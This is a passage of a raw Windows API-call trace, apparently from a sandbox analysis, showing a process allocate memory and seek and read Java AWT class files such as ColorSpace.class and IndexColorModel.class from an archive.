lpNumberOfBytesRead=0x208b840, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b840*=0xa0, lpOverlapped=0x0) returned 1 [0128.903] malloc (_Size=0x26) returned 0x12ddab00 [0128.903] strlen (_Str="java/awt/image/PackedColorModel.class") returned 0x25 [0128.903] strcpy (in: _Dest=0x208b9f0, _Source="java/awt/image/PackedColorModel.class" | out: _Dest="java/awt/image/PackedColorModel.class") returned="java/awt/image/PackedColorModel.class" [0128.904] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb7c96, lpNewFilePointer=0x208b470, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b470*=50035862) returned 1 [0128.904] ReadFile (in: hFile=0x134, lpBuffer=0x208b4c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b440, lpOverlapped=0x0 | out: lpBuffer=0x208b4c0*, lpNumberOfBytesRead=0x208b440*=0x1e, lpOverlapped=0x0) returned 1 [0128.904] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb7cd9, lpNewFilePointer=0x208b4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4d0*=50035929) returned 1 [0128.904] ReadFile (in: hFile=0x134, lpBuffer=0x1227cfa0, nNumberOfBytesToRead=0xfae, lpNumberOfBytesRead=0x208b4a0, lpOverlapped=0x0 | out: lpBuffer=0x1227cfa0*, lpNumberOfBytesRead=0x208b4a0*=0xfae, lpOverlapped=0x0) returned 1 [0128.905] free (_Block=0x12dda680) [0128.905] free (_Block=0x12e5ef70) [0128.915] strlen (_Str="java/awt/color/ColorSpace.class") returned 0x1f [0128.915] malloc (_Size=0x48) returned 0x12e5ede0 [0128.915] malloc (_Size=0xa0) returned 0x12daaef0 [0128.915] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411dce, lpNewFilePointer=0x208bf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf70*=54599118) returned 1 [0128.915] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf40, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208bf40*=0xa0, lpOverlapped=0x0) returned 1 [0128.915] malloc (_Size=0x20) returned 0x12dda8f0 [0128.916] strlen (_Str="java/awt/color/ColorSpace.class") returned 0x1f [0128.916] strcpy (in: _Dest=0x208c0f0, _Source="java/awt/color/ColorSpace.class" | out: _Dest="java/awt/color/ColorSpace.class") returned="java/awt/color/ColorSpace.class" [0128.916] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb6c79, lpNewFilePointer=0x208bb70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb70*=50031737) returned 1 [0128.916] ReadFile (in: hFile=0x134, lpBuffer=0x208bbc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb40, lpOverlapped=0x0 | out: lpBuffer=0x208bbc0*, lpNumberOfBytesRead=0x208bb40*=0x1e, lpOverlapped=0x0) returned 1 [0128.917] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb6cb6, lpNewFilePointer=0x208bbd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbd0*=50031798) returned 1 [0128.917] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xfe0, lpNumberOfBytesRead=0x208bba0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bba0*=0xfe0, lpOverlapped=0x0) returned 1 [0128.918] free (_Block=0x12ddab00) [0128.918] free (_Block=0x12e5f830) [0128.922] malloc (_Size=0x48) returned 0x12e5ee80 [0128.922] malloc (_Size=0xa0) returned 0x12dac650 [0128.922] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411d80, lpNewFilePointer=0x208bec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bec0*=54599040) returned 1 [0128.922] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be90, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208be90*=0xa0, lpOverlapped=0x0) returned 1 [0128.923] malloc (_Size=0x21) returned 0x12ddad70 [0128.923] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2df3, lpNewFilePointer=0x208bac0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bac0*=50015731) returned 1 [0128.923] ReadFile (in: hFile=0x134, lpBuffer=0x208bb10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ba90, lpOverlapped=0x0 | out: lpBuffer=0x208bb10*, lpNumberOfBytesRead=0x208ba90*=0x1e, lpOverlapped=0x0) returned 1 [0128.924] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2e31, lpNewFilePointer=0x208bb20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb20*=50015793) returned 1 [0128.924] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x3e48, lpNumberOfBytesRead=0x208baf0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208baf0*=0x3e48, lpOverlapped=0x0) returned 1 [0128.935] malloc (_Size=0x48) returned 0x12e5ff10 [0128.935] malloc (_Size=0xa0) returned 0x12dabd60 [0128.935] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411d2a, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=54598954) returned 1 [0128.935] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208c0a0*=0xa0, lpOverlapped=0x0) returned 1 [0128.935] malloc (_Size=0x29) returned 0x12ef4cd0 [0128.935] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2bf0, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=50015216) returned 1 [0128.935] ReadFile (in: hFile=0x134, lpBuffer=0x208bd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x208bd20*, lpNumberOfBytesRead=0x208bca0*=0x1e, lpOverlapped=0x0) returned 1 [0128.935] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2c36, lpNewFilePointer=0x208bd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd30*=50015286) returned 1 [0128.935] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1bd, lpNumberOfBytesRead=0x208bd00, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208bd00*=0x1bd, lpOverlapped=0x0) returned 1 [0128.936] malloc (_Size=0x48) returned 0x12e5f510 [0128.936] malloc (_Size=0xa0) returned 0x12dac9c0 [0128.936] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411cd5, lpNewFilePointer=0x208bf30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf30*=54598869) returned 1 [0128.936] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf00, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208bf00*=0xa0, lpOverlapped=0x0) returned 1 [0128.937] malloc (_Size=0x28) returned 0x12ddae90 [0128.937] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2723, lpNewFilePointer=0x208bb30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb30*=50013987) returned 1 [0128.937] ReadFile (in: hFile=0x134, lpBuffer=0x208bb80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb00, lpOverlapped=0x0 | out: lpBuffer=0x208bb80*, lpNumberOfBytesRead=0x208bb00*=0x1e, lpOverlapped=0x0) returned 1 [0128.937] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2768, lpNewFilePointer=0x208bb90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb90*=50014056) returned 1 [0128.937] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x488, lpNumberOfBytesRead=0x208bb60, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bb60*=0x488, lpOverlapped=0x0) returned 1 [0128.938] malloc (_Size=0x48) returned 0x12e5ff60 [0128.938] malloc (_Size=0xa0) returned 0x12dac390 [0128.938] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411c84, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=54598788) returned 1 [0128.938] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208c040*=0xa0, lpOverlapped=0x0) returned 1 [0128.938] malloc (_Size=0x24) returned 0x12dda830 [0128.939] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2282, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=50012802) returned 1 [0128.939] ReadFile (in: hFile=0x134, lpBuffer=0x208bcc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x208bcc0*, lpNumberOfBytesRead=0x208bc40*=0x1e, lpOverlapped=0x0) returned 1 [0128.939] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb22c3, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=50012867) returned 1 [0128.939] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bca0*=0x460, lpOverlapped=0x0) returned 1 [0128.940] malloc (_Size=0x48) returned 0x12e5f880 [0128.940] malloc (_Size=0xa0) returned 0x12dabb50 [0128.940] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411c34, lpNewFilePointer=0x208bfa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfa0*=54598708) returned 1 [0128.940] ReadFile (in: hFile=0x134, lpBuffer=0x12dabb50, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf70, lpOverlapped=0x0 | out: lpBuffer=0x12dabb50*, lpNumberOfBytesRead=0x208bf70*=0xa0, lpOverlapped=0x0) returned 1 [0128.940] malloc (_Size=0x23) returned 0x12ddad10 [0128.940] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2010, lpNewFilePointer=0x208bba0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bba0*=50012176) returned 1 [0128.940] ReadFile (in: hFile=0x134, lpBuffer=0x208bbf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb70, lpOverlapped=0x0 | out: lpBuffer=0x208bbf0*, lpNumberOfBytesRead=0x208bb70*=0x1e, lpOverlapped=0x0) returned 1 [0128.940] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb2050, lpNewFilePointer=0x208bc00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc00*=50012240) returned 1 [0128.940] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x232, lpNumberOfBytesRead=0x208bbd0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208bbd0*=0x232, lpOverlapped=0x0) returned 1 [0128.941] malloc (_Size=0x48) returned 0x12e5ee80 [0128.941] malloc (_Size=0xa0) returned 0x12dab520 [0128.941] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411be1, lpNewFilePointer=0x208b4e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4e0*=54598625) returned 1 [0128.941] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b4b0, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208b4b0*=0xa0, lpOverlapped=0x0) returned 1 [0128.941] malloc (_Size=0x26) returned 0x12dda8f0 [0128.941] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb1f21, lpNewFilePointer=0x208b0e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b0e0*=50011937) returned 1 [0128.941] ReadFile (in: hFile=0x134, lpBuffer=0x208b130, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b0b0, lpOverlapped=0x0 | out: lpBuffer=0x208b130*, lpNumberOfBytesRead=0x208b0b0*=0x1e, lpOverlapped=0x0) returned 1 [0128.943] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb1f64, lpNewFilePointer=0x208b140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b140*=50012004) returned 1 [0128.943] ReadFile (in: hFile=0x134, lpBuffer=0x1227a610, nNumberOfBytesToRead=0xac, lpNumberOfBytesRead=0x208b110, lpOverlapped=0x0 | out: lpBuffer=0x1227a610*, lpNumberOfBytesRead=0x208b110*=0xac, lpOverlapped=0x0) returned 1 [0128.944] malloc (_Size=0x48) returned 0x12e5ff60 [0128.944] malloc (_Size=0xa0) returned 0x12dab890 [0128.944] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411b90, lpNewFilePointer=0x208c180, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c180*=54598544) returned 1 [0128.944] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c150, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208c150*=0xa0, lpOverlapped=0x0) returned 1 [0128.944] malloc (_Size=0x24) returned 0x12ddace0 [0128.945] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb106f, lpNewFilePointer=0x208bd80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd80*=50008175) returned 1 [0128.945] ReadFile (in: hFile=0x134, lpBuffer=0x208bdd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bd50, lpOverlapped=0x0 | out: lpBuffer=0x208bdd0*, lpNumberOfBytesRead=0x208bd50*=0x1e, lpOverlapped=0x0) returned 1 [0128.945] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb10b0, lpNewFilePointer=0x208bde0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bde0*=50008240) returned 1 [0128.945] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xe71, lpNumberOfBytesRead=0x208bdb0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bdb0*=0xe71, lpOverlapped=0x0) returned 1 [0128.946] malloc (_Size=0x48) returned 0x12e5ede0 [0128.946] malloc (_Size=0xa0) returned 0x12daace0 [0128.946] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411b3b, lpNewFilePointer=0x208bff0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bff0*=54598459) returned 1 [0128.946] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfc0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208bfc0*=0xa0, lpOverlapped=0x0) returned 1 [0128.946] malloc (_Size=0x28) returned 0x12ddb0a0 [0128.947] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb076f, lpNewFilePointer=0x208bbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbf0*=50005871) returned 1 [0128.947] ReadFile (in: hFile=0x134, lpBuffer=0x208bc40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bbc0, lpOverlapped=0x0 | out: lpBuffer=0x208bc40*, lpNumberOfBytesRead=0x208bbc0*=0x1e, lpOverlapped=0x0) returned 1 [0128.948] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb07b4, lpNewFilePointer=0x208bc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc50*=50005940) returned 1 [0128.948] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x8bb, lpNumberOfBytesRead=0x208bc20, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bc20*=0x8bb, lpOverlapped=0x0) returned 1 [0128.949] malloc (_Size=0x48) returned 0x12e5ff60 [0128.949] malloc (_Size=0xa0) returned 0x12dabc00 [0128.949] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411ae4, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=54598372) returned 1 [0128.949] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208c0e0*=0xa0, lpOverlapped=0x0) returned 1 [0128.949] malloc (_Size=0x2a) returned 0x12ef4cd0 [0128.949] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb0426, lpNewFilePointer=0x208bd10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd10*=50005030) returned 1 [0128.949] ReadFile (in: hFile=0x134, lpBuffer=0x208bd60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bce0, lpOverlapped=0x0 | out: lpBuffer=0x208bd60*, lpNumberOfBytesRead=0x208bce0*=0x1e, lpOverlapped=0x0) returned 1 [0128.949] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb046d, lpNewFilePointer=0x208bd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd70*=50005101) returned 1 [0128.949] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x302, lpNumberOfBytesRead=0x208bd40, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bd40*=0x302, lpOverlapped=0x0) returned 1 [0128.951] malloc (_Size=0x48) returned 0x12e600a0 [0128.951] malloc (_Size=0xa0) returned 0x12dac9c0 [0128.951] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411a98, lpNewFilePointer=0x208c380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c380*=54598296) returned 1 [0128.951] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c350, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208c350*=0xa0, lpOverlapped=0x0) returned 1 [0128.951] malloc (_Size=0x1f) returned 0x12ddaef0 [0128.951] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fafbb1, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=50002865) returned 1 [0128.951] ReadFile (in: hFile=0x134, lpBuffer=0x208bfd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x208bfd0*, lpNumberOfBytesRead=0x208bf50*=0x1e, lpOverlapped=0x0) returned 1 [0128.952] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fafbed, lpNewFilePointer=0x208bfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfe0*=50002925) returned 1 [0128.952] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x839, lpNumberOfBytesRead=0x208bfb0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bfb0*=0x839, lpOverlapped=0x0) returned 1 [0128.953] malloc (_Size=0x48) returned 0x12e5fce0 [0128.953] malloc (_Size=0xa0) returned 0x12dab520 [0128.953] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411a47, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=54598215) returned 1 [0128.953] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208b890*=0xa0, lpOverlapped=0x0) returned 1 [0128.953] malloc (_Size=0x24) returned 0x12ddaf20 [0128.953] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fafa20, lpNewFilePointer=0x208b4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4c0*=50002464) returned 1 [0128.953] ReadFile (in: hFile=0x134, lpBuffer=0x208b510, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b490, lpOverlapped=0x0 | out: lpBuffer=0x208b510*, lpNumberOfBytesRead=0x208b490*=0x1e, lpOverlapped=0x0) returned 1 [0128.953] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fafa61, lpNewFilePointer=0x208b520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b520*=50002529) returned 1 [0128.954] ReadFile (in: hFile=0x134, lpBuffer=0x1227ae50, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x208b4f0, lpOverlapped=0x0 | out: lpBuffer=0x1227ae50*, lpNumberOfBytesRead=0x208b4f0*=0x150, lpOverlapped=0x0) returned 1 [0128.954] malloc (_Size=0x48) returned 0x12e5f560 [0128.954] malloc (_Size=0xa0) returned 0x12dac390 [0128.954] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34119f6, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=54598134) returned 1 [0128.954] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208b890*=0xa0, lpOverlapped=0x0) returned 1 [0128.954] malloc (_Size=0x24) returned 0x12dda740 [0128.955] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faf8b9, lpNewFilePointer=0x208b4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4c0*=50002105) returned 1 [0128.955] ReadFile (in: hFile=0x134, lpBuffer=0x208b510, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b490, lpOverlapped=0x0 | out: lpBuffer=0x208b510*, lpNumberOfBytesRead=0x208b490*=0x1e, lpOverlapped=0x0) returned 1 [0128.955] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faf8fa, lpNewFilePointer=0x208b520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b520*=50002170) returned 1 [0128.955] ReadFile (in: hFile=0x134, lpBuffer=0x1227ae50, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208b4f0, lpOverlapped=0x0 | out: lpBuffer=0x1227ae50*, lpNumberOfBytesRead=0x208b4f0*=0x126, lpOverlapped=0x0) returned 1 [0128.956] malloc (_Size=0x48) returned 0x12e5ed90 [0128.956] malloc (_Size=0xa0) returned 0x12dab940 [0128.956] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34119a5, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=54598053) returned 1 [0128.956] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208b890*=0xa0, lpOverlapped=0x0) returned 1 [0128.956] malloc (_Size=0x24) returned 0x12ddafb0 [0128.956] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faf7d9, lpNewFilePointer=0x208b4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4c0*=50001881) returned 1 [0128.956] ReadFile (in: hFile=0x134, lpBuffer=0x208b510, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b490, lpOverlapped=0x0 | out: lpBuffer=0x208b510*, lpNumberOfBytesRead=0x208b490*=0x1e, lpOverlapped=0x0) returned 1 [0128.956] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faf81a, lpNewFilePointer=0x208b520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b520*=50001946) returned 1 [0128.956] ReadFile (in: hFile=0x134, lpBuffer=0x1227ae50, nNumberOfBytesToRead=0x9f, lpNumberOfBytesRead=0x208b4f0, lpOverlapped=0x0 | out: lpBuffer=0x1227ae50*, lpNumberOfBytesRead=0x208b4f0*=0x9f, lpOverlapped=0x0) returned 1 [0128.957] malloc (_Size=0x48) returned 0x12e5eed0 [0128.957] malloc (_Size=0xa0) returned 0x12daace0 [0128.957] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411959, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=54597977) returned 1 [0128.958] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208b890*=0xa0, lpOverlapped=0x0) returned 1 [0128.958] malloc (_Size=0x1f) returned 0x12dda740 [0128.958] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faf677, lpNewFilePointer=0x208b4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4c0*=50001527) returned 1 [0128.958] ReadFile (in: hFile=0x134, lpBuffer=0x208b510, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b490, lpOverlapped=0x0 | out: lpBuffer=0x208b510*, lpNumberOfBytesRead=0x208b490*=0x1e, lpOverlapped=0x0) returned 1 [0128.958] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faf6b3, lpNewFilePointer=0x208b520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b520*=50001587) returned 1 [0128.958] ReadFile (in: hFile=0x134, lpBuffer=0x1227ae40, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208b4f0, lpOverlapped=0x0 | out: lpBuffer=0x1227ae40*, lpNumberOfBytesRead=0x208b4f0*=0x126, lpOverlapped=0x0) returned 1 [0128.959] malloc (_Size=0x48) returned 0x12e60000 [0128.959] malloc (_Size=0xa0) returned 0x12daaef0 [0128.959] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411908, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=54597896) returned 1 [0128.959] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b890*=0xa0, lpOverlapped=0x0) returned 1 [0128.959] malloc (_Size=0x24) returned 0x12ddab00 [0128.959] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faf332, lpNewFilePointer=0x208b4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4c0*=50000690) returned 1 [0128.959] ReadFile (in: hFile=0x134, lpBuffer=0x208b510, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b490, lpOverlapped=0x0 | out: lpBuffer=0x208b510*, lpNumberOfBytesRead=0x208b490*=0x1e, lpOverlapped=0x0) returned 1 [0128.959] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faf373, lpNewFilePointer=0x208b520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b520*=50000755) returned 1 [0128.959] ReadFile (in: hFile=0x134, lpBuffer=0x1227ae50, nNumberOfBytesToRead=0x304, lpNumberOfBytesRead=0x208b4f0, lpOverlapped=0x0 | out: lpBuffer=0x1227ae50*, lpNumberOfBytesRead=0x208b4f0*=0x304, lpOverlapped=0x0) returned 1 [0128.962] strlen (_Str="java/awt/image/IndexColorModel.class") returned 0x24 [0128.963] malloc (_Size=0x48) returned 0x12e5f010 [0128.963] malloc (_Size=0xa0) returned 0x12dabb50 [0128.963] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34118b6, lpNewFilePointer=0x208d0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0d0*=54597814) returned 1 [0128.963] ReadFile (in: hFile=0x134, lpBuffer=0x12dabb50, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d0a0, lpOverlapped=0x0 | out: lpBuffer=0x12dabb50*, lpNumberOfBytesRead=0x208d0a0*=0xa0, lpOverlapped=0x0) returned 1 [0128.963] malloc (_Size=0x25) returned 0x12dda980 [0128.963] strlen (_Str="java/awt/image/IndexColorModel.class") returned 0x24 [0128.963] strcpy (in: _Dest=0x208d250, _Source="java/awt/image/IndexColorModel.class" | out: _Dest="java/awt/image/IndexColorModel.class") returned="java/awt/image/IndexColorModel.class" [0128.963] SetFilePointerEx (in: hFile=0x134, 